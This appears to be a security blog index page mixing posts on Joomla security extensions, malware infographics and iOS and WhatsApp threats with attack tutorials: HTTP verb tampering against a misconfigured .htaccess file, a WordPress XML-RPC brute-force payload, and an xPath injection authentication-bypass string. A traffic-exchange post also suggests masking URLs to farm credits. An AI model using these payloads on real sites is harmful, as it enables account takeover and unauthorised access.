Latest Post
Sign up for FREE daily Updates.

5 Best Joomla Security Extensions For You to Breathe Easy






Apart from WordPress and Drupal content management systems, Joomla is the most popular CMS used all over the world to power websites of all sorts and sizes. Just like any other open-source CMS, Joomla powered sites also have to deal with hacking attacks. In fact, almost every day Joomla powered site encounter callous hackers who mutilate website pages, upload backdoors and steal or delete sensitive information. And sadly, most of the attacks cost website owners substantial amount of time and money in getting the damage fixed. And so, it becomes needful for website owners take all the possible measures into account that helps to strengthen security of their Joomla site.

In this post we have come up with a list of remarkably useful Joomla extensions that helps to secure your Joomla website. 



jHackGuard

 










jHackGuard is an extension designed by Siteground that helps to protect the websites of Joomla users from being hacked. The extension is made publicly available to Joomla site owners, irrespective of whether they're using Siteground hosting services or not. This extension is a blend of a security plugin (that does the system work) and component (that helps to handle configurations) – that helps to protect a Joomla site by filtering the user's input data and integrating more PHP security settings. But, the plugin is disabled so that filters don't prevent authenticated administrators from performing their administrative tasks.


jHackGuard is compatible with Joomla version 3 and higher. And so, if you want to protect your site security running on an older Joomla version, you can choose to download the appropriate versions of jHackGuard for the older Joomla versions such as jHackGuard for Joomla 1.5 or other.







Akeeba Backup









Akeeba Backup formerly known as JoomlaPack is an open-source and free backup component that helps in creating a full website backup – that can be used to restore your site on any server running Joomla powered sites. It lets you create a backup of your website in just a single archive, including all the files, a “database snapshot” and an “installer”.
The best aspect about this extension is that it runs an AJAX-powered backup and restore process that helps to prevent server timeouts – even when you're running a large website. Besides, you can choose to create a backup of only your website files or database. It is compatible with Joomla version 2.5 or 3.x only.






 

HTTP Verb Tampering Demo/Example/Tutorial



What is HTTP Verb?

  •  According to Wiki "The Hypertext Transfer Protocol (HTTP) is an application protocol for distributed, collaborative, hypermedia information systems.  HTTP is the foundation of data communication for the World Wide Web.

  • Verb is nothing but HTTP methods used to indicate the desired action to be performed on the identified resource.


-  List of some basic HTTP Verb or Methods
  • OPTIONS
  • GET
  • HEAD
  • POST 
  • PUT
  • DELETE
  • TRACE
  • CONNECT



What is HTTP Verb Tampering? 

It's a method to bypass a defense technique by tampering the verb. Some secret directories have restricted access by  basic authentication. This directories are protected by the .htaccess file which can be easily exploited. This attack is a result of a Apache  htaccess file misconfiguration .

An administrator, limits the access to the private resource or directory just via POST request method. See the vulnerable code below.















Here AuthUserFile is the directory to the .htpasswd file which contains the username & password in encrypted format.

<LIMIT GET POST>
require valid-user
</LIMIT>


It just limits the POST method & matches the credentials that saved in htpasswd file, if wrong error page shows up.


Here the administrator has limited POST method, but also not blacklisted other methods?. This means any requests via other method would lead the attacker having access to the protected  private resources or directory. Below i have provided a video DEMO of  successful exploitation of an HTTP Verb tampering vulnerability via Live HTTP Headers ( Firefox add-on) on AT&T sub domain (Reported & Fixed). In the next post i will be showing you various ways to fix or apply a patch to this vulnerability .



 







 

Best Traffic Exchange service website | Hitleap



There's a huge demand for traffic exchange websites. You can find "N" no. of websites out there on internet providing the service of traffic exchange. After having an experience with all of them, i came to the conclusion  Hitleap is the one of the best & top website in terms of their services, monetary profit & website performance. The website works by earning minutes by surfing others website via Hitleap viewer software & then spending them on getting traffic on your website. You can earn number of  minutes easily just by surfing others website via the hit leap viewer software, just open & let it earn minutes for you. The minutes you will be using later in order to get traffic to your submitted website. Depending upon the minutes you will be getting traffic to your URL. The submitted website needs to be approved by their moderator which is done within fraction of seconds. It also provides a feature for setting  how many second's or minutes an visitor should stay on your website.

Earning via HitLeap ?

- Some websites provide credits just by visiting the URL, you can mask them & submit it to hitleap in order to to sit back & earn. ( Will be covering this in later tutorials briefly)

- Referrals ( 10% of the minutes your referrals earn
20% of the cash value of any purchase )


Click on the below banner to visit the website & Register yourself.

Free Traffic
 

Mobile security infestation [Infographics]

The explosion in popularity of mobile devices has changed the way that people go about their daily lives. Their reliance on the efficiency and speed of these gadgets has made location--often--irrelevant. However, with the reliance comes risk; the number of viruses and hackers lurking for unencrypted data has risen dramatically over the past few years, a number closely related to the rise in smartphone and tablet usage over that same period of time.


This infographic, provided by TollFreeForwarding.com, is an interesting look at mobile security, how it is being exploited, and the future of safe usage on mobile devices.is an interesting look at mobile security, how it is being exploited, and the future of safe usage on mobile devices.

 Russel Cooke is a journalist based in Louisville, KY. His love of technology often drives his stories, which also center around social media, content creation, and marketing. You can follow him on Twitter @RusselCooke2.



 

Wordpress XML-RPC Brute Force Attack Vulnerability

Today i'll be sharing a easy & quite  interesting tutorial on Wordpress XML-RPC Brute Force Attack.
As we all know nowadays when every an attacker gets his hands on a WordPress website, the first thing he would try to do in order to compromise the website is a brute force attack. The attacker loads a list of user & password combination in order to guess the correct one. Its always the first & mandatory option to try in point of view of a newbie attacker. The result of an increase in brute force attack day buy day, the developers have started using Login captcha plugins to protect them selves form such attack.


XML-RPC is a word press interface & this functionality is turned by default since WordPress 3.5. Recently we have seen very critical vulnerability been found in the same which effected a quarter of the internet - Ping Back DDOS Vulnerability, Arbitrary code Execution etc. Recently it has came to known that attackers are taking advent of the XML-RPC wp.getUsersBlogs method in order to launch a brute force attack against the website. In XML-RPC many of the calls need the credentials in order to implement. Then attacker can try different combinations on user & passwords. The output is thrown on the webpage weather its valid or invalid.



Step by step guide -



 - Locate the XMLRPC on the target website - localhost/xmlrpc.php


















- Send a POST request with the following code given below.

<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value> <string>user</string></value></param>  <param><value><string>password</string></value></param></params></methodCall>












- Check the response

If wrong combination - faultCode


  


If right - isAdmin









Hope you all liked this tutorial.  Any queries? Drop it down in comments!.


 

Malware: How we are Infected [InfoGraphic]

So you have a computer, but if it was infected with a virus, what would you do? Would you even know it was there? It is a well-known fact that over 32% of all computers in the world have malware of some sort. Today we will be talking about the infamous computer virus and what it is.

So let's start with something you all have probably heard of, Malware. Malware is a program made to infiltrate your computer, disable parts of it, and thus gain access to your hard drive, search history and such to aid with stealing information. However, there are other types of malware out there. Let's get to know them and how much of the 32% they infect.

At 57%, first we have the virus. This is a software that has the capability to copy itself and send itself into other folders. Then there is the "Trojan" at 21%. The Trojan is malicious software that hides on the internet disguised as some sort of program or free item, and ce you download it, you will soon discover it is malicious. But the Trojan has a brother at 7%, called the "Trojan Downloader". This type of virus does the same thing as the simple Trojan, but once on your computer it downloads more viruses and software, then begins to use those programs.

Then at 3% there is the "Exploit", which finds a glitch, bug or system error and uses that to hack into your computer. Next we have the "Worm" at 2%, this malicious bug works the same as a Trojan, but then copies and pastes itself across your computer network.

But not all viruses seem so bad when you get them, for instance the "Adware" at 3%. This type of virus infects your computer so nothing happens at first, but once you log into your web browser, then immediately your screen will be flooded with ads. There is also the "Monitoring Tool" with 2% of the 32% infected. This malware infects your computer and hides, not doing anything but monitoring your activity, (Search history, keyboard history etc.) and then sends those back to a remote server.

There is also one of the worst at 1%, the "Back Door". This virus infects your computer remotely, not allowing your anti-virus security to even detect it, but sure enough it does. And lastly we have one of the worst but luckily at a low percentage of 0.01%, "Spyware". This diabolically designed software infects your computer and takes the most important pieces of information it can find and sends it back to wherever it came from. This information is generally passwords, credit card numbers and other sensitive information.
All of these viruses have devastating effects. Last year there were 27 million strains of malware made, which means 74,000 new viruses are created every day. The number of homes in the United States that experience spam is 24 million. The number of homes with serious viruses in the last 2 years is 16 million, and the number of houses that had spyware in the last 6 months is 6 million. But most devastating of all, over 1 million of all homes have lost money to spyware in the last year. Another devastating fact is that Viruses cost the world 4.55 billion USD every year.

So be safe, don't download anything you are unsure of, and be sure to have an anti-virus software. But most importantly learn how to detect these programs when you get them.






















 

Follow The Following Steps To Make Facebook Page With No Name,



    1) First of all, click here to create your new Facebook page.


    2) Select a Category. Example- Entertainment and after that choose a category.

       3) Copy the code inside the brackets [ ᠌᠌᠌᠌᠌] and paste in the name field.
     4) Click on I agree to Facebook Pages Terms and then Get Stated And All Done You Can    See A Page With No Name Is Created 


 

iOS Update Quashes Dangerous SSL Bug

5497202855_bbbca2a000_o.jpg

Photo by: Duncan Hull


If you haven't gotten the iOS 7.0.6 update, you need to stop what you're doing and get it now. There's a dangerous SSL bug that can hurt you in numerous ways if you don't take care of it right away by updating your Apple operating system. Even if you have an older version, you're going to want to make sure you're protected and have the latest OS available for your particular mobile device.


Back in February of this year, it came out that not updating could lead to bad people being able to read and modify encrypted communications whether people were using iPhones, iPads or other iOS devices. As you might imagine, this upset a lot of people. The good news is that Apple was pretty quick at making sure an update was available for people who downloaded it.


And yet that's part of the problem - not everyone updates their operating system on their own, especially on their phone or mobile device. Some people have claimed that it wasn't a flaw and was built-in iOS as a means for people - like the NSA perhaps - to be able to spy on people easier. Apple denied the claims, of course, but if you Google around, you're going to find some interesting speculation about the "flaw" found in iOS.


According to Ars Technica, the problem may have gone beyond iOS mobile devices and actually affected Mac OS X users - even if they had all the current patches and updates installed! According to them, "[The] vulnerability has been confirmed in iOS versions 6.1.5, 7.0.4, and 7.0.5, and OS X 10.9.0 and 10.9.1." That's quite a wide vulnerability. And while Apple seemed to be working fast to squash the bug last month, there's a good chance that a lot of people still don't have it patched.


In order to make sure you stay safe, here are some specific tips you should follow.


  • Always Update - The first thing you want to do is make sure you ALWAYS update your OS when you find out there's a new version available.
  • Be Aware - In order to know when you should update your OS, you're going to make sure you're aware of major problems that have been found.
  • Act Quickly - The sooner you patch the vulnerable code, the sooner you're going to be safe from attacks.


While there's no guarantee your mobile devices are going to be safe and secure, you want to make sure you take whatever steps you can to guarantee that you're as safe as possible. If you have any thoughts or opinions about the latest iOS update that killed some major security flaws, feel free to leave a comment below and let us know what you're thinking.


Guest Post:

Written by: Jenny Corteza has used a City Directory Theme because it made her life as a writer a whole lot easier. She's been writing technology articles for many years now.
 

WhatsApp spam used by ASProx Botnet to Deliver Kuluoz Malware

5448944597_8e70da64ab_o.png

Photo by: Sean MacEntee




As you probably know, Facebook bought WhatsApp for an obscene amount of money in stock earlier this year. What you might not know is that there's a lot of WhatsApp spam that is being used by ASProx Botnet to deliver nasty Kuluoz malware to unsuspecting  users. This is not good news any way you look at the situation. Keep reading if you want to know more about this as well as what you should do to stay safe.


Here's a look at some of the dates when the WhatsApp problem has made Malcovery's "Today's Top Threats" list.


  1. SEPTEMBER 19, 23, 24, 25, 26
  2. OCTOBER 2, 3, 4, 7, 8, 9, 10, 11, 16, 17, 18, 21, 22, 23, 24, 25
  3. NOVEMBER 14
  4. JANUARY 9, 13, 15, 20, 28


Looking at that list, it's easy to start wondering why nothing has been done sooner about the problem. Additionally, it really makes you wonder why Facebook paid so much for the company by offering them stock options.


Going back to November of last year, ComputerWorld published an article about how WhatsApp was one of the top five brands imitated to deliver malware with spam. That's quite a bit of recognition - and not in a good way.


Here's a look at some specific ways you can stay safe and avoid Kuluoz and other malware.

  • Use Protection - The very first thing you want to do is make sure you're using some type of protection. The good news is that you don't need to spend a lot of money to get decent anti-virus software these days.
  • Update Protection - Having protection software is nice, but if you never update it at all, you're going to find that there's still a high chance your computer will get infected and quit working correctly.
  • Be Suspicious - If you're not sure of something online, you want to err on the side of caution and not take any unnecessary risks. Even with a brand like WhatsApp - that's connected to Facebook now - you want to be very careful and know what you're doing.
  • Educate Yourself - Last but most certainly not least, you should make an effort to stay informed about how malware works and the steps you can take to protect yourself from it whenever possible. This is really the best way you can make sure your computer stays safe and virus free.


Following the advice above, there's a good chance you'll be able to avoid WhatsApp spam and not get infected with Kuluoz malware. Still, it's a good idea to pay attention and update your anti-virus software all the time. If you have any experience with WhatsApp that's negative, please leave us a comment below. 







Guest Post - 
 
Written by: Jenny Corteza deals with staff outsourcing all the time. She's a writer and dealing with editors and others can sometimes be a problem. Still, she loves writing articles about technology. Go figure.





 

What is xPath Injection? How to exploit with xPath? [Part 1]

xPath Injection occurs when inputs supplied by the users are not properly sanitized and a malicious attacker is able to send and construct a malformed xPath query for XML data with the intention to extract sensitive information to which normal users don't have access to. It is similar to SQL Injection where attackers does the same, in SQL Injection, SQL queries are made and in xPath Injection, xPath queries are made for XML data/. Queries XML is done through xPath which is type of a simple descriptive statements that allows XML query to locate certain information.

To understand more clearly how a XML document looks like, have a look below. It is a simple XML document codes to authenticate a user based upon the combination of username and password they entered.


<users>
<user>
<name>Administrator</name>
<username>hackingsec</username>
<password>password123!</password>
<admin>1</admin>
</user>
<user>
<name>Admin</name>
<username>admin</username>
<password>reddit12</password>
<admin>0</admin>
</user>
</users>
















When the username 'admin' and password 'reddit12' are entered, the following xPath query is executed

/*[0]/user[username=”admin” and
password=”reddit12”]

Which would return the following

<user>
<name>Admin</name>
<username>admin</username>
<password>reddit12</password>
<admin>0</admin>

</user>


Exploiting xPath Injection : Authentication Bypass

An malicious user can bypass the authentication by sending specially crafted input query.

/*[0]/user[username=”admin” and password=”reddit12”]

If an attacker submits the following malicious input:

username: admin" or "1" ="1
password: anything

the XPATH query which will be executed will be the following:

/*[0]/user[username=”admin" or "1"="1” and
password=”anything”]

The XPath query will result in authentication bypass and an attacker will be able to login to the
application as user "admin". This is because the OR clause in the XPath query is a condition which is always true. Under XPath (similar to SQL) the AND clause has precedence over the OR clause, so the XPath query will be evaluated as shown by the following pseudo-code:

username ="admin" or [TRUE AND False]
which will result in:
username ="admin" or FALSE

As the username admin is valid, the attacker will be able to login as this user.


That was a basic introduction to tell you, what xPath actually is and to exploit it. I will be dividing this post into 3 separate parts. This was the 1st part, in 2nd part I will be explaining how to extract database information through xPath Injection. In 3rd part we will be talking about some automated tools for exploiting xPath Injection.
 
 
Support : Blog | Hacking-Sec | PHP-Sec
Copyright © 2014. Hacking-Sec - All Rights Reserved

UA-55004066-1